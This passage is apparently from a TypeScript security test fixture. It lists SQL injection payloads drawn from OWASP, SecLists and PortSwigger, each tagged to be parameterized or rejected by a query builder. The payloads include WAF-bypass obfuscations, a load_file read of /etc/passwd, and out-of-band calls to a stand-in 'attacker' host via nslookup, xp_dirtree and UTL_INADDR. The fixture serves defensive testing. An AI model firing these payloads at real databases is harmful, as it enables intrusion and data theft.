        id: 'encoding_whitespace_case_obfuscation-05',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: "%00' OR '1'='1",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-06',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '%09OR%091=1',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-07',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '%0aOR%0a1=1',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-08',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '%0d%0aOR%0d%0a1=1',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-09',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '/**/UNION/**/SELECT/**/1,2--',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-10',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Encoding / whitespace / case obfuscation',
        payload: 'uni%6fn%20select%201,2--',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-11',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '%55nion%20select%201,2',
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-12',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: "' OR 1=1%23",
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-13',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: "' OR 1=1%2D%2D",
        applicablePosition: 'relation',
        expectedBehavior: 'reject',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-14',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'Encoding / whitespace / case obfuscation',
        payload: "' OR 1=1;%00",
        applicablePosition: 'lookup_key',
        expectedBehavior: 'reject',
    },
    {
        id: 'encoding_whitespace_case_obfuscation-15',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'Encoding / whitespace / case obfuscation',
        payload: '0x27204f5220313d312d2d',
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'waf_bypass_mutation-01',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: '/*!50000UNION*/ /*!50000SELECT*/ 1,2',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'waf_bypass_mutation-02',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: '/*!12345OR*/ 1=1',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'waf_bypass_mutation-03',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: 'UNIunionON SELselectECT 1,2',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'waf_bypass_mutation-04',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: 'un/**/ion sel/**/ect 1,2',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'waf_bypass_mutation-05',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'WAF-bypass mutation strings',
        payload: 'OR 1=1 LIMIT 1/*',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'waf_bypass_mutation-06',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: 'or/**/a/**/=/**/a',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'waf_bypass_mutation-07',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: '(SELECT/**/*/**/1)',
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'waf_bypass_mutation-08',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: '+UNION+SELECT+1,2',
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'waf_bypass_mutation-09',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'WAF-bypass mutation strings',
        payload: '%2f%2a*/union%2f%2a/select%2f%2a*/1,2',
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'waf_bypass_mutation-10',
        source: 'OWASP SQL Injection Bypassing WAF',
        sourceUrl: 'https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF',
        category: 'WAF-bypass mutation strings',
        payload: 'or 1/*\n*/=/*\n*/1',
        applicablePosition: 'lookup_key',
        expectedBehavior: 'reject',
    },
    {
        id: 'dbms_specific_functions-01',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR UTL_INADDR.get_host_address('attacker') IS NOT NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'dbms_specific_functions-02',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR xp_dirtree '\\\\attacker\\share' --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'dbms_specific_functions-03',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR load_file('/etc/passwd') IS NOT NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'dbms_specific_functions-04',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR copy (SELECT '') to program 'nslookup attacker' --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'dbms_specific_functions-05',
        source: 'SecLists Generic SQLi',
        sourceUrl:
            'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/Databases/SQLi/Generic-SQLi.txt',
        category: 'DBMS-specific function payloads',
        payload: "' OR sqlite_version() IS NOT NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'dbms_specific_functions-06',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR current_database() IS NOT NULL --",
        applicablePosition: 'value',
        expectedBehavior: 'parameterize',
    },
    {
        id: 'dbms_specific_functions-07',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR @@version IS NOT NULL --",
        applicablePosition: 'relation',
        expectedBehavior: 'reject',
    },
    {
        id: 'dbms_specific_functions-08',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR db_name() IS NOT NULL --",
        applicablePosition: 'identifier',
        expectedBehavior: 'reject',
    },
    {
        id: 'dbms_specific_functions-09',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR version() IS NOT NULL --",
        applicablePosition: 'order',
        expectedBehavior: 'reject',
    },
    {
        id: 'dbms_specific_functions-10',
        source: 'PortSwigger SQL Injection Cheat Sheet',
        sourceUrl: 'https://portswigger.net/web-security/sql-injection/cheat-sheet',
        category: 'DBMS-specific function payloads',
        payload: "' OR user() IS NOT NULL --",
        applicablePosition: 'lookup_key',
        expectedBehavior: 'reject',
    },
] satisfies readonly SqlInjectionCase[];

export const sqlInjectionRejectCases = sqlInjectionCorpus.filter((testCase) => testCase.expectedBehavior === 'reject');
export const sqlInjectionValueCases = sqlInjectionCorpus.filter(
    (testCase) => testCase.expectedBehavior === 'parameterize'
);
